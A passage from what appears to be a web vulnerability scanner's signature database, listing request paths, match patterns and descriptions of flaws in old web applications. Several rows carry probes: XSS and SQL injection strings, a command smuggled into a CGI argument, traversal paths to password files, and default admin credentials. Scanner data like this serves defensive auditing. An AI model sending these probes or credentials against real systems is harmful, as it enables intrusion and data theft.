traversal.\",\"\",\"\"\n\"001489\",\"2799\",\"8\",\"@CGIDIRSdose.pl?daily&somefile.txt&|ls|\",\"GET\",\"somefile\\.txt\",\"\",\"200\",\"\",\"\",\"DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.\",\"\",\"\"\n\"001490\",\"2813\",\"4\",\"/admin/database/wwForum.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein\",\"\",\"\"\n\"001491\",\"2830\",\"5\",\"/../config.dat\",\"GET\",\"EnablePasswords\",\"\",\"\",\"\",\"\",\"Directory traversal and config.dat suggests NetServe web server and default admin folder. This file contains the administrative login/pass.\",\"\",\"\"\n\"001492\",\"284\",\"3\",\"/iisadmpwd/aexp2.htr\",\"GET\",\"200\",\"\",\"\",\"value=\\\"\\\"\",\"\",\"Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.\",\"\",\"\"\n\"001493\",\"284\",\"3\",\"/iisadmpwd/aexp2b.htr\",\"GET\",\"200\",\"\",\"\",\"value=\\\"\\\"\",\"\",\"Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.\",\"\",\"\"\n\"001494\",\"284\",\"3\",\"/iisadmpwd/aexp3.htr\",\"GET\",\"200\",\"\",\"\",\"value=\\\"\\\"\",\"\",\"Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.\",\"\",\"\"\n\"001495\",\"284\",\"3\",\"/iisadmpwd/aexp4.htr\",\"GET\",\"200\",\"\",\"\",\"value=\\\"\\\"\",\"\",\"Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.\",\"\",\"\"\n\"001496\",\"284\",\"3\",\"/iisadmpwd/aexp4b.htr\",\"GET\",\"200\",\"\",\"\",\"value=\\\"\\\"\",\"\",\"Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.\",\"\",\"\"\n\"001497\",\"2842\",\"a\",\"//admin/aindex.htm\",\"GET\",\"src=\\\"admin.htm\\\"\",\"\",\"menu_frame\",\"\",\"\",\"FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt\",\"\",\"\"\n\"001498\",\"2873\",\"a\",\"@CGIDIRSgbadmin.cgi?action=change_adminpass\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200\",\"\",\"\"\n\"001499\",\"2873\",\"a\",\"@CGIDIRSgbadmin.cgi?action=change_automail\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200\",\"\",\"\"\n\"001500\",\"2873\",\"a\",\"@CGIDIRSgbadmin.cgi?action=colors\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200\",\"\",\"\"\n\"001501\",\"2873\",\"a\",\"@CGIDIRSgbadmin.cgi?action=setup\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200\",\"\",\"\"\n\"001502\",\"2915\",\"a\",\"@CGIDIRSgbpass.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\" RNN Guestbook 1.2 password storage file. Administrative password should be stored in plaintext. Access gbadmin.cgi in the same directory to (ab)use. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 2003 BugTraq post by brainrawt@ha\",\"\",\"\"\n\"001503\",\"2921\",\"4\",\"/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>\",\"GET\",\"<script>alert\\('test'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"VP-ASP prior to 4.50 are vulnerable to XSS attacks\",\"\",\"\"\n\"001504\",\"2921\",\"4\",\"/shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"VP-ASP Shopping Cart 4.x shopdisplayproducts.asp XSS.\",\"\",\"\"\n\"001505\",\"2922\",\"3\",\"/admin/wg_user-info.ml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"WebGate Web Eye exposes user names and passwords.\",\"\",\"\"\n\"001506\",\"2927\",\"4\",\"/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*\",\"GET\",\"Statistics for your banner\",\"\",\"\",\"\",\"\",\"Xoops 1.3.x, 2.0.x thru 2.0.5 are vulnerable to SQL injection in the banners.php file. Upgrade to 2.0.5.1 or higher.\",\"\",\"\"\n\"001507\",\"294\",\"a\",\"/c32web.exe/ChangeAdminPassword\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.\",\"\",\"\"\n\"001508\",\"2944\",\"3\",\"/showmail.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"@Mail WebMail 3.52 allows attacker to read arbitrary user's mailbox. Requires knowing valid user name and appending ?Folder=../../victim@somehost.com/mbox/Inbox to the showmail.pl file.\",\"\",\"\"\n\"001509\",\"2948\",\"9\",\"/reademail.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"@Mail WebMail 3.52 contains an SQL injection that allows attacker to read any email message for any address registered in the system. Example to append to reademail.pl: ?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1\",\"\",\"\"\n\"001510\",\"2950\",\"4\",\"/showmail.pl?Folder=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"404\",\"\",\"@Mail WebMail 3.52 contains an XSS in the showmail.pl file.\",\"\",\"\"\n\"001511\",\"3\",\"6\",\"/iissamples/exair/search/query.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.\",\"\",\"\"\n\"001512\",\"3058\",\"9\",\"/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]\",\"GET\",\"query error\",\"\",\"mySQL error\",\"\",\"\",\"Invision Power Board 2.0alpha3 and before are vulnerable to an SQL injection attack.\",\"\",\"\"\n\"001513\",\"3059\",\"9\",\"/index.php?offset=[%20Problem%20Here%20]\",\"GET\",\"error in your SQL syntax\",\"\",\"\",\"\",\"\",\"Invision Power Top Site List 1.1 contains an SQL injection vulnerability.\",\"\",\"\"\n\"001514\",\"3092\",\"1\",\"/buddies.blt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Buddy List?\",\"\",\"\"\n\"001515\",\"3092\",\"1\",\"/buddy.blt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Buddy List?\",\"\",\"\"\n\"001516\",\"3092\",\"1\",\"/buddylist.blt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Buddy List?\",\"\",\"\"\n\"001517\",\"3092\",\"1\",\"@CGIDIRSaddalink.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001518\",\"3092\",\"1\",\"@CGIDIRScgiecho\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001519\",\"3092\",\"1\",\"@CGIDIRScgiemail\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001520\",\"3092\",\"1\",\"@CGIDIRScountedit\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001521\",\"3092\",\"1\",\"@CGIDIRSdomainredirect.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001522\",\"3092\",\"1\",\"@CGIDIRSentropybanner.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001523\",\"3092\",\"1\",\"@CGIDIRSentropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/\",\"GET\",\"(Permission denied|No matches)\",\"\",\"\",\"\",\"\",\"CPanel's Entropy Search allows username enumeration via the user parameter.\",\"\",\"\"\n\"001524\",\"3092\",\"1\",\"@CGIDIRSFormMail-clone.cgi\",\"GET\",\"Matt\\sWright\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001525\",\"3092\",\"1\",\"@CGIDIRShelpdesk.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001526\",\"3092\",\"1\",\"@CGIDIRSmchat.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001527\",\"3092\",\"1\",\"@CGIDIRSrandhtml.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001528\",\"3092\",\"1\",\"@CGIDIRSrealhelpdesk.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001529\",\"3092\",\"1\",\"@CGIDIRSrealsignup.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001530\",\"3092\",\"1\",\"@CGIDIRSscgiwrap\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001531\",\"3092\",\"1\",\"@CGIDIRSsignup.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001532\",\"3268\",\"12\",\"/pdf/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001533\",\"3092\",\"1\",\"/sqlnet.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle log file found.\",\"\",\"\"\n\"001534\",\"3092\",\"1\",\"@CGIDIRSGW5/GWWEB.EXE\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Groupwise web interface\",\"\",\"\"\n\"001535\",\"3092\",\"1\",\"/.psql_history\",\"GET\",\"^(INSERT|insert|delete|DELETE|drop|DROP|grant|GRANT|select|SELECT)\",\"\",\"200\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001536\",\"3092\",\"1\",\"/acceso/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001537\",\"3092\",\"1\",\"/access-log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001538\",\"3092\",\"1\",\"/access.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001539\",\"3092\",\"1\",\"/access/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001540\",\"3092\",\"1\",\"/access_log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001541\",\"3092\",\"1\",\"/acciones/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001542\",\"3092\",\"1\",\"/account/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001543\",\"3092\",\"1\",\"/accounting/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001544\",\"3092\",\"1\",\"/activex/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001545\",\"3092\",\"1\",\"/adm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001546\",\"3092\",\"1\",\"/admin.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001547\",\"3092\",\"1\",\"/admin.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001548\",\"3092\",\"1\",\"/admin.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001549\",\"3092\",\"1\",\"/admin.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001550\",\"3092\",\"1\",\"/admin.shtml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001551\",\"3092\",\"1\",\"/admin/\",\"GET\",\"200\",\"Directory Listing Denied\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001552\",\"3092\",\"1\",\"/Administration/\",\"GET\",\"200\",\"Directory Listing Denied\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001553\",\"3092\",\"1\",\"/administration/\",\"GET\",\"200\",\"Directory Listing Denied\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001554\",\"3092\",\"1\",\"/administrator/\",\"GET\",\"200\",\"Directory Listing Denied\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001555\",\"3092\",\"1\",\"/Admin_files/\",\"GET\",\"200\",\"Directory Listing Denied\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001556\",\"3092\",\"1\",\"/advwebadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: probably HostingController, www.hostingcontroller.com\",\"\",\"\"\n\"001557\",\"3092\",\"1\",\"/Agent/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001558\",\"3092\",\"1\",\"/Agentes/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001559\",\"3092\",\"1\",\"/agentes/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001560\",\"3092\",\"1\",\"/Agents/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001561\",\"3092\",\"1\",\"/analog/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001562\",\"3092\",\"1\",\"/apache/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001563\",\"3092\",\"1\",\"/app/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001564\",\"3092\",\"1\",\"/applicattion/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001565\",\"3092\",\"1\",\"/applicattions/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001566\",\"3092\",\"1\",\"/apps/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001567\",\"3092\",\"1\",\"/archivar/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001568\",\"3092\",\"1\",\"/archive/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001569\",\"3092\",\"1\",\"/archives/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001570\",\"3092\",\"1\",\"/archivo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001571\",\"3092\",\"1\",\"/asp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001572\",\"3092\",\"1\",\"/Asp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001573\",\"3092\",\"1\",\"/atc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001574\",\"3092\",\"1\",\"/auth/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001575\",\"3092\",\"1\",\"/awebvisit.stat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001576\",\"3092\",\"1\",\"/ayuda/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001577\",\"3092\",\"1\",\"/backdoor/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001578\",\"3092\",\"1\",\"/backup/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001579\",\"3092\",\"1\",\"/bak/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001580\",\"3092\",\"1\",\"/banca/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001581\",\"3092\",\"1\",\"/banco/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001582\",\"3092\",\"1\",\"/bank/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001583\",\"3092\",\"1\",\"/bbv/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001584\",\"3092\",\"1\",\"/bdata/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001585\",\"3092\",\"1\",\"/bdatos/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001586\",\"3092\",\"1\",\"/beta/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001587\",\"3092\",\"1\",\"/bin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001588\",\"3092\",\"1\",\"/boot/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001589\",\"3092\",\"1\",\"/buy/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001590\",\"3092\",\"1\",\"/buynow/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001591\",\"3092\",\"1\",\"/c/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001592\",\"3092\",\"1\",\"/cache-stats/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001593\",\"3092\",\"1\",\"/caja/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001594\",\"3092\",\"1\",\"/card/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001595\",\"3092\",\"1\",\"/cards/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001596\",\"3092\",\"1\",\"/cart/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001597\",\"3092\",\"1\",\"/cash/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001598\",\"3092\",\"1\",\"/ccard/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001599\",\"3092\",\"1\",\"/ccbill/secure/ccbill.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  CC Bill log file?\",\"\",\"\"\n\"001601\",\"3092\",\"1\",\"/cdrom/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001602\",\"3092\",\"1\",\"/cert/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001603\",\"3092\",\"1\",\"/certificado/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001604\",\"3092\",\"1\",\"/certificate\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001605\",\"3092\",\"1\",\"/certificates\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001606\",\"3092\",\"1\",\"/cfdocs/exampleapp/email/application.cfm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001607\",\"3092\",\"1\",\"/cfdocs/exampleapp/publish/admin/addcontent.cfm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001608\",\"3092\",\"1\",\"/cfdocs/exampleapp/publish/admin/application.cfm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001609\",\"3092\",\"1\",\"/cfdocs/examples/httpclient/mainframeset.cfm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001610\",\"3092\",\"1\",\"@CGIDIRSdbmlparser.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001612\",\"3092\",\"1\",\"/client/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001613\",\"3092\",\"1\",\"/cliente/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001614\",\"3092\",\"1\",\"/clientes/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001615\",\"3092\",\"1\",\"/clients/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001617\",\"3268\",\"2\",\"/code/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001618\",\"3092\",\"1\",\"/communicator/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001619\",\"3092\",\"1\",\"/compra/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001620\",\"3092\",\"1\",\"/compras/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001621\",\"3092\",\"1\",\"/compressed/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001622\",\"3092\",\"1\",\"/conecta/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001623\",\"3268\",\"2\",\"/config/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001624\",\"3092\",\"1\",\"/config/checks.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001625\",\"3092\",\"1\",\"/connect/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001626\",\"3092\",\"1e\",\"/console\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001627\",\"3092\",\"1\",\"/correo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001628\",\"3268\",\"2\",\"/counter/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001629\",\"3268\",\"2\",\"/credit/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001630\",\"3092\",\"1\",\"/crypto/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001631\",\"3092\",\"1\",\"/css/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001632\",\"3092\",\"1\",\"/cuenta/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001633\",\"3092\",\"1\",\"/cuentas/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001634\",\"3268\",\"2\",\"/customers/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001635\",\"3092\",\"1\",\"/dan_o.dat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001636\",\"3092\",\"1\",\"/dat/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001637\",\"3092\",\"1\",\"/data/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001638\",\"3092\",\"1\",\"/dato/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001639\",\"3092\",\"1\",\"/datos/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001640\",\"3092\",\"1\",\"/db/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001641\",\"3092\",\"1\",\"/dbase/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001642\",\"3092\",\"1\",\"/demo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001643\",\"3092\",\"1\",\"/demos/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001644\",\"3092\",\"1\",\"/dev/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001645\",\"3092\",\"1\",\"/devel/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001646\",\"3092\",\"1\",\"/development/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001647\",\"3092\",\"1\",\"/dir/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001648\",\"3092\",\"1\",\"/directory/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001649\",\"3092\",\"1\",\"/DMR/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001650\",\"3092\",\"1\",\"/doc-html/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001651\",\"3092\",\"1\",\"/down/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001652\",\"3092\",\"1\",\"/download/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001653\",\"3092\",\"1\",\"/downloads/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be 